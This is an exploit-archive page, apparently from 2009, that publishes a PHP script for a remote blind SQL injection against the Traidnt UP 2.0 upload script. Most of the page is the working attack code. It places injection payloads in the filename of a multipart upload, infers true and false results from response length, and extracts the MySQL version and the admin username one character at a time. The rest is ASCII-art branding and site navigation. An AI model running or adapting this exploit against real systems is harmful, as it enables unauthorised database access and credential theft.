Traidnt UP 2.0 Blind SQL Injection

Traidnt UP 2.0 Blind SQL Injection: Posted Jul 14, 2009; Authored by Qabandi; Traidnt UP version 2.0 remote blind SQL injection exploit.; tags | exploit, remote, sql injection; SHA-256 | 91ca9fa7869c9ff3324665f02602c4656557d8d3db808db252cf321b92cf8200; Download | Favorite | View

Traidnt UP 2.0 Blind SQL Injection

<?php
print_r('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Traidnt UP 2.0 Blind SQL Inj.  __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] _FILES <3                   /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] Magic Quotes == OFF!      |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[WHAT?]-                \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|      Sec-Code.com ;)  Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!!   |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
USAGE: php whatever.php localhost /upload/

Will give you username and mysql version ONLY ;)
');

ini_set("max_execution_time",0);

 function QABANDI($victim,$vic_dir,$injection){
$host = $victim;
$p = "http://".$host.$vic_dir;
$inj = $injection;
$content="qabandi";

$data='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="upfile_0"; filename="q.jpg'.$inj.'"
Content-Type: image/jpg

'.$content.'
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="tr_upload"

upload
-----------------------------7d529a1d23092a--
';




          $packet ="POST ".$p."/upload.php?upload_range=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;


         //print $packet;
  $o = @fsockopen($host, 80);
  if(!$o){
    echo "\n[x] No response...\n";
    die;
  }
  
  fputs($o, $packet);
  while (!feof($o)) $data .= fread($o, 1024);
  fclose($o);
  
  $_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
  if ( !empty($_404) ){
    echo "\n[x] 404 Not Found... Make sure of path. \n";
    die;
  }

                                           return $data;

 }

$host1 = $argv[1];
$userdir1=$argv[2];


$Truths = strlen(QABANDI($host1,$userdir1,"' and 1='1"));

//echo "truths = ".round($Truths, -3);
$yes = round($Truths, -3);

$Falses = strlen(QABANDI($host1,$userdir1,"' and 1='q"));

//echo "\nfalses = ".round($Falses, -3);

$no = round($Falses, -3);

if($yes == $no){
  echo "Website not vulnerable\nMagic quotes Must be OFF!";
  die;
}
echo "\n MySQL version =";

$sql4 = "' and substring(@@version,1,1)='4";
$sql5 = "' and substring(@@version,1,1)='5";

$myver4 = strlen(QABANDI($host1,$userdir1,$sql4));
$myver4 = round($myver4, -3);


$myver5 = strlen(QABANDI($host1,$userdir1,$sql5));
$myver5 = round($myver5, -3);

if( $myver5 == $yes ){
  echo "5";
}
if( $myver4 == $yes ){
 echo "4";
}



 echo "\n Username: ";
   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),1,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),2,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),3,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),4,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

    for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),5,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }


   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),6,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }


   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),7,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),8,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),9,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

   for ($i = 46; $i <= 122; $i++) {
 $ass = "' and ascii(substring((select admin_user from admin limit 0,1),10,1))='".$i;
      $zyklon = strlen(QABANDI($host1,$userdir1,$ass));
      $zyklon = round($zyklon, -3);

      if($zyklon == $yes){
       echo chr($i);
      }
   }

die;


?>

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 90 files
Gentoo 31 files
Debian 23 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,077)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,339)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,263)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,651)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

Traidnt UP 2.0 Blind SQL Injection

Traidnt UP 2.0 Blind SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Traidnt UP 2.0 Blind SQL Injection

Share This

Traidnt UP 2.0 Blind SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems